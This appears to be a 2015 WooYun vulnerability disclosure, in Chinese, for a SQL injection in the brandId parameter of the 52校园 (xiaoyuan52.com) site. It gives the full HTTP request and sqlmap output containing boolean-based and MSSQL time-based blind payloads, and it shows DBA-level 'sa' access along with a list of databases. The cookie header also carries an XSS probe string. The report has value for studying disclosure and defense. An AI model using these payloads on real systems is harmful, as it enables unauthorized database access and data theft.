当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159728

漏洞标题:52校园主站存在SQL注入(DBA权限)

相关厂商:52校园

漏洞作者: 路人甲

提交时间:2015-12-10 19:59

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

www.xiaoyuan52.com


GET /ServiceProductDetailServlet?aid=234&brandId= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.xiaoyuan52.com/
Cookie: JSESSIONID=A0BB8836496506E48280E2FD1FF9A6FB; Hm_lvt_02a7e8de3462731a4306808d32ba6624=1449568247; Hm_lpvt_02a7e8de3462731a4306808d32ba6624=1449568247; Hm_lvt_9cb8846b548404438c81aaa02eda4f0f=1449569305,1449569323,1449569337,1449569460; Hm_lpvt_9cb8846b548404438c81aaa02eda4f0f=1449569460; __utma=46112941.752146213.1449568247.1449568247.1449568247.1; __utmb=46112941.4.10.1449568247; __utmc=46112941; __utmz=46112941.1449568247.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_1007db9ceeef283a9034565ae4ded9ea=1449568780,1449568809,1449569056,1449569545; Hm_lpvt_1007db9ceeef283a9034565ae4ded9ea=1449569545; __c_sesslist_45193=e9tugjszlg_cy1; __c_pv_45193=6; __c_session_45193=1449568247477812; __c_today_45193=1; __c_review_45193=0; __c_last_45193=1449568247477; __c_visitor=1449568247477812; __c_session_at_45193=1449569463396; HMACCOUNT=73DDED9F0E84E15A; __cs_visitor=1449568247477812; __cs_skey=43cbwd; cokShengId=cb824cad61d045f0a038f4d96100c6b1; cokShiId=df1ede907d8b4753bfe3dd5150e0d63f; cokSchoolId=1773; Hm_lvt_cc0a85323aaa033084fa9bde21f127e9=1449569243; Hm_lpvt_cc0a85323aaa033084fa9bde21f127e9=1449569243; Hm_lvt_fdfea51f5530d9b1730875677c8b0ca8=1449569245; Hm_lpvt_fdfea51f5530d9b1730875677c8b0ca8=1449569245; Hm_lvt_3be674bc521868af0b6a4f4abe42f5e1=1449569247,1449569275; Hm_lpvt_3be674bc521868af0b6a4f4abe42f5e1=1449569275; __utmv=; opcid=1449569277183_1253895130; opsid=1449569277183_1095337246; oppt=oneplus; opsct=1449569277184; opbct=1449569277184; opnt=1449569277184; opstep=1; optime_browser=1449569277183; opstep_event=0; opnt_event=1449569277184; Hm_lvt_927e53b3ef9848d0b2b347b67f64cd59=1449569324,1449569330,1449569460; Hm_lpvt_927e53b3ef9848d0b2b347b67f64cd59=1449569460; __utmt=1; BAIDUID=B6FA785FD29ADA1C8E56E87A07518F28:FG=1
Host: www.xiaoyuan52.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


brandId参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: brandId (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: aid=234&brandId=-8286' OR 8471=8471 AND 'yVwZ'='yVwZ
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: aid=234&brandId=-1' OR 4578=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mzvK'='mzvK
---
back-end DBMS: Microsoft SQL Server 2008
current user:    'sa'
current database:    'P2Psite'
current user is DBA:    True
available databases [8]:
[*] master
[*] model
[*] msdb
[*] p2p
[*] P2Psite
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝